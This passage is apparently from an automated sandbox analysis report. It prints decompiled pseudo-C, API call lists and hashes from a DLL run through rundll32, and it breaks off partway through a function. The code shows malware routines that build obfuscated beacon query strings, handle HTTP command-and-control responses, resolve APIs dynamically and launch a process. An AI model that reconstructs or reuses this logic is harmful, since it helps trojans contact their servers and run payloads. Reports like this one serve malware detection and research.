                                  • Part of subcall function 0428A0FD: memset.NTDLL ref: 0428A138
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap$lstrlenmemcpymemset
                                • String ID: Ut
                                • API String ID: 3442150357-8415677
                                • Opcode ID: 71cd24309a9a8eee072809def228e37ed9bd4b1de42ad18bb195640c1c01c01a
                                • Instruction ID: 8f0f7a25fee8edb6c5e0221d2014a76bd59ed8716f93ac572af61c91dfea0a30
                                • Opcode Fuzzy Hash: 71cd24309a9a8eee072809def228e37ed9bd4b1de42ad18bb195640c1c01c01a
                                • Instruction Fuzzy Hash: 59816374B33106AEE710FBB8ED88D6F76ADDB48700764491DA405D71C9EE39F9458B20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 74%
                                			E04285450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                				void* _v8;
                                				signed int _v12;
                                				void* _v16;
                                				void* _v20;
                                				void* _v24;
                                				void* _v28;
                                				void* __ebx;
                                				void* __edi;
                                				long _t59;
                                				intOrPtr _t60;
                                				intOrPtr _t61;
                                				intOrPtr _t62;
                                				intOrPtr _t63;
                                				intOrPtr _t64;
                                				void* _t67;
                                				intOrPtr _t68;
                                				int _t71;
                                				void* _t72;
                                				void* _t73;
                                				void* _t75;
                                				void* _t78;
                                				intOrPtr _t82;
                                				intOrPtr _t86;
                                				intOrPtr* _t88;
                                				void* _t94;
                                				intOrPtr _t100;
                                				signed int _t104;
                                				char** _t106;
                                				int _t109;
                                				intOrPtr* _t112;
                                				intOrPtr* _t114;
                                				intOrPtr* _t116;
                                				intOrPtr* _t118;
                                				intOrPtr _t121;
                                				intOrPtr _t126;
                                				int _t130;
                                				CHAR* _t132;
                                				intOrPtr _t133;
                                				void* _t134;
                                				void* _t143;
                                				int _t144;
                                				void* _t145;
                                				intOrPtr _t146;
                                				void* _t148;
                                				long _t152;
                                				intOrPtr* _t153;
                                				intOrPtr* _t154;
                                				intOrPtr* _t157;
                                				void* _t158;
                                				void* _t160;
                                
                                				_t143 = __edx;
                                				_t134 = __ecx;
                                				_t59 = __eax;
                                				_v12 = 8;
                                				if(__eax == 0) {
                                					_t59 = GetTickCount();
                                				}
                                				_t60 =  *0x428d018; // 0xefcf766a
                                				asm("bswap eax");
                                				_t61 =  *0x428d014; // 0x3a87c8cd
                                				_t132 = _a16;
                                				asm("bswap eax");
                                				_t62 =  *0x428d010; // 0xd8d2f808
                                				asm("bswap eax");
                                				_t63 = E0428D00C; // 0xeec43f25
                                				asm("bswap eax");
                                				_t64 =  *0x428d2a8; // 0xaea5a8
                                				_t3 = _t64 + 0x428e633; // 0x74666f73
                                				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0x428d02c,  *0x428d004, _t59);
                                				_t67 = E04283288();
                                				_t68 =  *0x428d2a8; // 0xaea5a8
                                				_t4 = _t68 + 0x428e673; // 0x74707526
                                				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                				_t160 = _t158 + 0x38;
                                				_t145 = _t144 + _t71;
                                				_t72 = E0428831C(_t134);
                                				_t133 = __imp__; // 0x74e05520
                                				_v8 = _t72;
                                				if(_t72 != 0) {
                                					_t126 =  *0x428d2a8; // 0xaea5a8
                                					_t7 = _t126 + 0x428e8d4; // 0x736e6426
                                					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                					_t160 = _t160 + 0xc;
                                					_t145 = _t145 + _t130;
                                					HeapFree( *0x428d238, 0, _v8);
                                				}
                                				_t73 = E04289267();
                                				_v8 = _t73;
                                				if(_t73 != 0) {
                                					_t121 =  *0x428d2a8; // 0xaea5a8
                                					_t11 = _t121 + 0x428e8dc; // 0x6f687726
                                					wsprintfA(_t145 + _a16, _t11, _t73);
                                					_t160 = _t160 + 0xc;
                                					HeapFree( *0x428d238, 0, _v8);
                                				}
                                				_t146 =  *0x428d32c; // 0x4d795b0
                                				_t75 = E0428284E(0x428d00a, _t146 + 4);
                                				_t152 = 0;
                                				_v20 = _t75;
                                				if(_t75 == 0) {
                                					L26:
                                					HeapFree( *0x428d238, _t152, _a16);
                                					return _v12;
                                				} else {
                                					_t78 = RtlAllocateHeap( *0x428d238, 0, 0x800);
                                					_v8 = _t78;
                                					if(_t78 == 0) {
                                						L25:
                                						HeapFree( *0x428d238, _t152, _v20);
                                						goto L26;
                                					}
                                					E04283239(GetTickCount());
                                					_t82 =  *0x428d32c; // 0x4d795b0
                                					__imp__(_t82 + 0x40);
                                					asm("lock xadd [eax], ecx");
                                					_t86 =  *0x428d32c; // 0x4d795b0
                                					__imp__(_t86 + 0x40);
                                					_t88 =  *0x428d32c; // 0x4d795b0
                                					_t148 = E04287B8D(1, _t143, _a16,  *_t88);
                                					_v28 = _t148;
                                					asm("lock xadd [eax], ecx");
                                					if(_t148 == 0) {
                                						L24:
                                						HeapFree( *0x428d238, _t152, _v8);
                                						goto L25;
                                					}
                                					StrTrimA(_t148, 0x428c28c);
                                					_push(_t148);
                                					_t94 = E0428A677();
                                					_v16 = _t94;
                                					if(_t94 == 0) {
                                						L23:
                                						HeapFree( *0x428d238, _t152, _t148);
                                						goto L24;
                                					}
                                					_t153 = __imp__;
                                					 *_t153(_t148, _a4);
                                					 *_t153(_v8, _v20);
                                					_t154 = __imp__;
                                					 *_t154(_v8, _v16);
                                					_t100 = E04287B3B( *_t154(_v8, _t148), _v8);
                                					_a4 = _t100;
                                					if(_t100 == 0) {
                                						_v12 = 8;
                                						L21:
                                						E04285433();
                                						L22:
                                						HeapFree( *0x428d238, 0, _v16);
                                						_t152 = 0;
                                						goto L23;
                                					}
                                					_t104 = E04289F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                					_v12 = _t104;
                                					if(_t104 == 0) {
                                						_t157 = _v24;
                                						_v12 = E0428137B(_t157, _a4, _a8, _a12);
                                						_t112 =  *((intOrPtr*)(_t157 + 8));
                                						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                						_t114 =  *((intOrPtr*)(_t157 + 8));
                                						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                						_t116 =  *((intOrPtr*)(_t157 + 4));
                                						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                						_t118 =  *_t157;
                                						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                						E04288B22(_t157);
                                					}
                                					if(_v12 != 0x10d2) {
                                						L16:
                                						if(_v12 == 0) {
                                							_t106 = _a8;
                                							if(_t106 != 0) {
                                								_t149 =  *_t106;
                                								_t155 =  *_a12;
                                								wcstombs( *_t106,  *_t106,  *_a12);
                                								_t109 = E04287953(_t149, _t149, _t155 >> 1);
                                								_t148 = _v28;
                                								 *_a12 = _t109;
                                							}
                                						}
                                						goto L19;
                                					} else {
                                						if(_a8 != 0) {
                                							L19:
                                							E04288B22(_a4);
                                							if(_v12 == 0 || _v12 == 0x10d2) {
                                								goto L22;
                                							} else {
                                								goto L21;
                                							}
                                						}
                                						_v12 = _v12 & 0x00000000;
                                						goto L16;
                                					}
                                				}
                                			}
                                0x04285450
                                0x04285450
                                0x04285450
                                0x04285459
                                0x04285462
                                0x04285464
                                0x04285464
                                0x04285471
                                0x0428547c
                                0x0428547f
                                0x04285484
                                0x0428548d
                                0x04285490
                                0x04285495
                                0x04285498
                                0x0428549d
                                0x042854a0
                                0x042854ac
                                0x042854b9
                                0x042854bb
                                0x042854c1
                                0x042854c6
                                0x042854d1
                                0x042854d3
                                0x042854d6
                                0x042854d8
                                0x042854dd
                                0x042854e3
                                0x042854e8
                                0x042854eb
                                0x042854f0
                                0x042854fd
                                0x042854ff
                                0x04285505
                                0x0428550f
                                0x0428550f
                                0x04285511
                                0x04285516
                                0x0428551b
                                0x0428551e
                                0x04285523
                                0x04285530
                                0x04285532
                                0x04285540
                                0x04285540
                                0x04285542
                                0x04285550
                                0x04285555
                                0x04285557
                                0x0428555c
                                0x0428571d
                                0x04285727
                                0x04285730
                                0x04285562
                                0x0428556e
                                0x04285574
                                0x04285579
                                0x04285711
                                0x0428571b
                                0x00000000
                                0x0428571b
                                0x04285585
                                0x0428558a
                                0x04285593
                                0x042855a4
                                0x042855a8
                                0x042855b1
                                0x042855b7
                                0x042855c6
                                0x042855cd
                                0x042855d6
                                0x042855dc
                                0x04285705
                                0x0428570f
                                0x00000000
                                0x0428570f
                                0x042855e8
                                0x042855ee
                                0x042855ef
                                0x042855f4
                                0x042855f9
                                0x042856fb
                                0x04285703
                                0x00000000
                                0x04285703
                                0x04285602
                                0x04285609
                                0x04285611
                                0x04285616
                                0x0428561f
                                0x0428562a
                                0x0428562f
                                0x04285634
                                0x04285733
                                0x042856e7
                                0x042856e7
                                0x042856ec
                                0x042856f7
                                0x042856f9
                                0x00000000
                                0x042856f9
                                0x0428563e
                                0x04285643
                                0x04285648
                                0x0428564d
                                0x0428565d
                                0x04285660
                                0x04285666
                                0x0428566c
                                0x04285672
                                0x04285675
                                0x0428567b
                                0x0428567e
                                0x04285683
                                0x04285687
                                0x04285687
                                0x04285693
                                0x0428569f
                                0x042856a3
                                0x042856a5
                                0x042856aa
                                0x042856ac
                                0x042856b1
                                0x042856b6
                                0x042856c3
                                0x042856cb
                                0x042856ce
                                0x042856ce
                                0x042856aa
                                0x00000000
                                0x04285695
                                0x04285699
                                0x042856d0
                                0x042856d3
                                0x042856dc
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x042856dc
                                0x0428569b
                                0x00000000
                                0x0428569b
                                0x04285693

                                APIs
                                • GetTickCount.KERNEL32 ref: 04285464
                                • wsprintfA.USER32 ref: 042854B4
                                • wsprintfA.USER32 ref: 042854D1
                                • wsprintfA.USER32 ref: 042854FD
                                • HeapFree.KERNEL32(00000000,?), ref: 0428550F
                                • wsprintfA.USER32 ref: 04285530
                                • HeapFree.KERNEL32(00000000,?), ref: 04285540
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0428556E
                                • GetTickCount.KERNEL32 ref: 0428557F
                                • RtlEnterCriticalSection.NTDLL(04D79570), ref: 04285593
                                • RtlLeaveCriticalSection.NTDLL(04D79570), ref: 042855B1
                                  • Part of subcall function 04287B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,04289DA0,?,04D795B0), ref: 04287BB8
                                  • Part of subcall function 04287B8D: lstrlen.KERNEL32(?,?,?,04289DA0,?,04D795B0), ref: 04287BC0
                                  • Part of subcall function 04287B8D: strcpy.NTDLL ref: 04287BD7
                                  • Part of subcall function 04287B8D: lstrcat.KERNEL32(00000000,?), ref: 04287BE2
                                  • Part of subcall function 04287B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04289DA0,?,04D795B0), ref: 04287BFF
                                • StrTrimA.SHLWAPI(00000000,0428C28C,?,04D795B0), ref: 042855E8
                                  • Part of subcall function 0428A677: lstrlen.KERNEL32(04D79B08,00000000,00000000,7691C740,04289DCB,00000000), ref: 0428A687
                                  • Part of subcall function 0428A677: lstrlen.KERNEL32(?), ref: 0428A68F
                                  • Part of subcall function 0428A677: lstrcpy.KERNEL32(00000000,04D79B08), ref: 0428A6A3
                                  • Part of subcall function 0428A677: lstrcat.KERNEL32(00000000,?), ref: 0428A6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 04285609
                                • lstrcpy.KERNEL32(?,?), ref: 04285611
                                • lstrcat.KERNEL32(?,?), ref: 0428561F
                                • lstrcat.KERNEL32(?,00000000), ref: 04285625
                                  • Part of subcall function 04287B3B: lstrlen.KERNEL32(?,00000000,04D79D18,00000000,04285142,04D79F3B,?,?,?,?,?,69B25F44,00000005,0428D00C), ref: 04287B42
                                  • Part of subcall function 04287B3B: mbstowcs.NTDLL ref: 04287B6B
                                  • Part of subcall function 04287B3B: memset.NTDLL ref: 04287B7D
                                • wcstombs.NTDLL ref: 042856B6
                                  • Part of subcall function 0428137B: SysAllocString.OLEAUT32(?), ref: 042813B6
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                • HeapFree.KERNEL32(00000000,?,?), ref: 042856F7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04285703
                                • HeapFree.KERNEL32(00000000,?,?,04D795B0), ref: 0428570F
                                • HeapFree.KERNEL32(00000000,?), ref: 0428571B
                                • HeapFree.KERNEL32(00000000,?), ref: 04285727
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID: Ut
                                • API String ID: 3748877296-8415677
                                • Opcode ID: fd70e7f037c0b4fe2cf3e0063fddf89d9e2df7b19de4c331a554c381ba16aea0
                                • Instruction ID: 39722943ee101726bc65dcb5808675ad908ea3782052cf18cdee0bcf0b1e1f04
                                • Opcode Fuzzy Hash: fd70e7f037c0b4fe2cf3e0063fddf89d9e2df7b19de4c331a554c381ba16aea0
                                • Instruction Fuzzy Hash: EB917A71A12119FFDB11AFA9EC48A9EBBB9EF08354F144018F404D72A0DB35ED55DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 73%
                                			E04283485(void* __eax, void* __ecx) {
                                				long _v8;
                                				char _v12;
                                				void* _v16;
                                				void* _v28;
                                				long _v32;
                                				void _v104;
                                				char _v108;
                                				long _t36;
                                				intOrPtr _t40;
                                				intOrPtr _t47;
                                				intOrPtr _t50;
                                				void* _t58;
                                				void* _t68;
                                				intOrPtr* _t70;
                                				intOrPtr* _t71;
                                
                                				_t1 = __eax + 0x14; // 0x74183966
                                				_t69 =  *_t1;
                                				_t36 = E04284944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                				_v8 = _t36;
                                				if(_t36 != 0) {
                                					L12:
                                					return _v8;
                                				}
                                				E0428A789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                				_t40 = _v12(_v12);
                                				_v8 = _t40;
                                				if(_t40 == 0 && ( *0x428d260 & 0x00000001) != 0) {
                                					_v32 = 0;
                                					asm("stosd");
                                					asm("stosd");
                                					asm("stosd");
                                					_v108 = 0;
                                					memset( &_v104, 0, 0x40);
                                					_t47 =  *0x428d2a8; // 0xaea5a8
                                					_t18 = _t47 + 0x428e3e6; // 0x73797325
                                					_t68 = E04287912(_t18);
                                					if(_t68 == 0) {
                                						_v8 = 8;
                                					} else {
                                						_t50 =  *0x428d2a8; // 0xaea5a8
                                						_t19 = _t50 + 0x428e747; // 0x4d78cef
                                						_t20 = _t50 + 0x428e0af; // 0x4e52454b
                                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                						if(_t71 == 0) {
                                							_v8 = 0x7f;
                                						} else {
                                							_v108 = 0x44;
                                							E04283179();
                                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                							_push(1);
                                							E04283179();
                                							if(_t58 == 0) {
                                								_v8 = GetLastError();
                                							} else {
                                								CloseHandle(_v28);
                                								CloseHandle(_v32);
                                							}
                                						}
                                						HeapFree( *0x428d238, 0, _t68);
                                					}
                                				}
                                				_t70 = _v16;
                                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                				E04288B22(_t70);
                                				goto L12;
                                			}
                                0x0428348d
                                0x0428348d
                                0x0428349c
                                0x042834a3
                                0x042834a8
                                0x042835b5
                                0x042835bc
                                0x042835bc
                                0x042834b7
                                0x042834bf
                                0x042834c2
                                0x042834c7
                                0x042834dc
                                0x042834e2
                                0x042834e3
                                0x042834e6
                                0x042834ec
                                0x042834ef
                                0x042834f4
                                0x042834fc
                                0x04283508
                                0x0428350c
                                0x0428359c
                                0x04283512
                                0x04283512
                                0x04283517
                                0x0428351e
                                0x04283532
                                0x04283536
                                0x04283585
                                0x04283538
                                0x04283539
                                0x04283540
                                0x04283559
                                0x0428355b
                                0x0428355f
                                0x04283566
                                0x04283580
                                0x04283568
                                0x04283571
                                0x04283576
                                0x04283576
                                0x04283566
                                0x04283594
                                0x04283594
                                0x0428350c
                                0x042835a3
                                0x042835ac
                                0x042835b0
                                0x00000000

                                APIs
                                  • Part of subcall function 04284944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,042834A1,?,00000001,?,?,00000000,00000000), ref: 04284969
                                  • Part of subcall function 04284944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0428498B
                                  • Part of subcall function 04284944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 042849A1
                                  • Part of subcall function 04284944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 042849B7
                                  • Part of subcall function 04284944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 042849CD
                                  • Part of subcall function 04284944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 042849E3
                                • memset.NTDLL ref: 042834EF
                                  • Part of subcall function 04287912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04283508,73797325), ref: 04287923
                                  • Part of subcall function 04287912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0428793D
                                • GetModuleHandleA.KERNEL32(4E52454B,04D78CEF,73797325), ref: 04283525
                                • GetProcAddress.KERNEL32(00000000), ref: 0428352C
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04283594
                                  • Part of subcall function 04283179: GetProcAddress.KERNEL32(36776F57,04288BDC), ref: 04283194
                                • CloseHandle.KERNEL32(00000000,00000001), ref: 04283571
                                • CloseHandle.KERNEL32(?), ref: 04283576
                                • GetLastError.KERNEL32(00000001), ref: 0428357A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                • String ID: Ut
                                • API String ID: 3075724336-8415677
                                • Opcode ID: 3abd06cba02d9bb6750e08a85b407db9f743942bc151a2e957587f48acbabd61
                                • Instruction ID: 028b2f749ac99c434c26cb1c61ff2c401780215ba9645c696024e8697f308afa
                                • Opcode Fuzzy Hash: 3abd06cba02d9bb6750e08a85b407db9f743942bc151a2e957587f48acbabd61
                                • Instruction Fuzzy Hash: 3D3172B1A11209AFDB10FFA4DC88D9EBBBCEB08754F00446DE905E7151D739AE48DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 27%
                                			E04288F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				long _v16;
                                				intOrPtr _v20;
                                				signed int _v24;
                                				void* __esi;
                                				long _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t46;
                                				void* _t48;
                                				void* _t49;
                                				void* _t50;
                                				intOrPtr _t54;
                                				intOrPtr _t57;
                                				void* _t58;
                                				void* _t59;
                                				void* _t60;
                                				intOrPtr _t66;
                                				void* _t71;
                                				void* _t74;
                                				intOrPtr _t75;
                                				void* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t80;
                                				intOrPtr _t91;
                                
                                				_t79 =  *0x428d33c; // 0x4d79bc0
                                				_v24 = 8;
                                				_t43 = GetTickCount();
                                				_push(5);
                                				_t74 = 0xa;
                                				_v16 = _t43;
                                				_t44 = E04289B1B(_t74,  &_v16);
                                				_v8 = _t44;
                                				if(_t44 == 0) {
                                					_v8 = 0x428c18c;
                                				}
                                				_t46 = E04287F8B(_t79);
                                				_v12 = _t46;
                                				if(_t46 != 0) {
                                					_t80 = __imp__;
                                					_t48 =  *_t80(_v8, _t71);
                                					_t49 =  *_t80(_v12);
                                					_t50 =  *_t80(_a4);
                                					_t54 = E04281525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                					_v20 = _t54;
                                					if(_t54 != 0) {
                                						_t75 =  *0x428d2a8; // 0xaea5a8
                                						_t16 = _t75 + 0x428eb08; // 0x530025
                                						 *0x428d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                						_push(4);
                                						_t77 = 5;
                                						_t57 = E04289B1B(_t77,  &_v16);
                                						_v8 = _t57;
                                						if(_t57 == 0) {
                                							_v8 = 0x428c190;
                                						}
                                						_t58 =  *_t80(_v8);
                                						_t59 =  *_t80(_v12);
                                						_t60 =  *_t80(_a4);
                                						_t91 = E04281525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                						if(_t91 == 0) {
                                							E04288B22(_v20);
                                						} else {
                                							_t66 =  *0x428d2a8; // 0xaea5a8
                                							_t31 = _t66 + 0x428ec28; // 0x73006d
                                							 *0x428d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                							 *_a16 = _v20;
                                							_v24 = _v24 & 0x00000000;
                                							 *_a20 = _t91;
                                						}
                                					}
                                					E04288B22(_v12);
                                				}
                                				return _v24;
                                			}

                                APIs
                                • GetTickCount.KERNEL32 ref: 04288F9A
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 04288FDA
                                • lstrlen.KERNEL32(00000000), ref: 04288FE3
                                • lstrlen.KERNEL32(00000000), ref: 04288FEA
                                • lstrlenW.KERNEL32(80000002), ref: 04288FF7
                                • lstrlen.KERNEL32(?,00000004), ref: 04289057
                                • lstrlen.KERNEL32(?), ref: 04289060
                                • lstrlen.KERNEL32(?), ref: 04289067
                                • lstrlenW.KERNEL32(?), ref: 0428906E
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: b74381fb8f573c5550b520b16f21fbaefefc917fbd8909ace1123da108344587
                                • Instruction ID: 75a52d4f362cddd8b45d1fbad8d739e95cb1e2177399d12111cfae7e28484f3c
                                • Opcode Fuzzy Hash: b74381fb8f573c5550b520b16f21fbaefefc917fbd8909ace1123da108344587
                                • Instruction Fuzzy Hash: E9419C72A01209FBDF11AFA4DC489DEBBB5EF44358F014058E904A7290DB35EA54DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E042857DD(void* __ecx, void* __esi) {
                                				long _v8;
                                				long _v12;
                                				long _v16;
                                				long _v20;
                                				long _t34;
                                				long _t39;
                                				long _t42;
                                				long _t56;
                                				void* _t58;
                                				void* _t59;
                                				void* _t61;
                                
                                				_t61 = __esi;
                                				_t59 = __ecx;
                                				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                				do {
                                					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                					_v20 = _t34;
                                					if(_t34 != 0) {
                                						L3:
                                						_v8 = 4;
                                						_v16 = 0;
                                						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                                							_t39 = GetLastError();
                                							_v12 = _t39;
                                							if(_v20 == 0 || _t39 != 0x2ef3) {
                                								L15:
                                								return _v12;
                                							} else {
                                								goto L11;
                                							}
                                						}
                                						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                                							goto L11;
                                						} else {
                                							_v16 = 0;
                                							_v8 = 0;
                                							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                                							_t58 = E04281525(_v8 + 1);
                                							if(_t58 == 0) {
                                								_v12 = 8;
                                							} else {
                                								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                                									E04288B22(_t58);
                                									_v12 = GetLastError();
                                								} else {
                                									 *((char*)(_t58 + _v8)) = 0;
                                									 *(_t61 + 0xc) = _t58;
                                								}
                                							}
                                							goto L15;
                                						}
                                					}
                                					SetEvent( *(_t61 + 0x1c));
                                					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                					_v12 = _t56;
                                					if(_t56 != 0) {
                                						goto L15;
                                					}
                                					goto L3;
                                					L11:
                                					_t42 = E042829C0( *(_t61 + 0x1c), _t59, 0xea60);
                                					_v12 = _t42;
                                				} while (_t42 == 0);
                                				goto L15;
                                			}

                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 042857F4
                                • SetEvent.KERNEL32(?), ref: 04285804
                                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04285836
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0428585B
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0428587B
                                • GetLastError.KERNEL32 ref: 0428588D
                                  • Part of subcall function 042829C0: WaitForMultipleObjects.KERNEL32(00000002,0428A923,00000000,0428A923,?,?,?,0428A923,0000EA60), ref: 042829DB
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                • GetLastError.KERNEL32(00000000), ref: 042858C2
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                • String ID:
                                • API String ID: 3369646462-0
                                • Opcode ID: cef23df63f93161d6fe02e369f4bc3172f6aca312356326467c13833205cfc03
                                • Instruction ID: 52bd490fec32245a7caed60c7d41c232a2407f1f9295e3142691d442f742d041
                                • Opcode Fuzzy Hash: cef23df63f93161d6fe02e369f4bc3172f6aca312356326467c13833205cfc03
                                • Instruction Fuzzy Hash: 1C312FB5A1120DFFDB20EFA5D88499EB7F8EF04344F10496EE502A2190D774BA849F60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 63%
                                			E04287B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _v8;
                                				intOrPtr _t9;
                                				intOrPtr _t13;
                                				char* _t28;
                                				void* _t33;
                                				void* _t34;
                                				char* _t36;
                                				intOrPtr* _t40;
                                				char* _t41;
                                				char* _t42;
                                				char* _t43;
                                
                                				_t34 = __edx;
                                				_push(__ecx);
                                				_t9 =  *0x428d2a8; // 0xaea5a8
                                				_t1 = _t9 + 0x428e62c; // 0x253d7325
                                				_t36 = 0;
                                				_t28 = E0428A055(__ecx, _t1);
                                				if(_t28 != 0) {
                                					_t40 = __imp__;
                                					_t13 =  *_t40(_t28);
                                					_v8 = _t13;
                                					_t41 = E04281525(_v8 +  *_t40(_a4) + 1);
                                					if(_t41 != 0) {
                                						strcpy(_t41, _t28);
                                						_pop(_t33);
                                						__imp__(_t41, _a4);
                                						_t36 = E04281188(_t34, _t41, _a8);
                                						E04288B22(_t41);
                                						_t42 = E0428976F(StrTrimA(_t36, "="), _t36);
                                						if(_t42 != 0) {
                                							E04288B22(_t36);
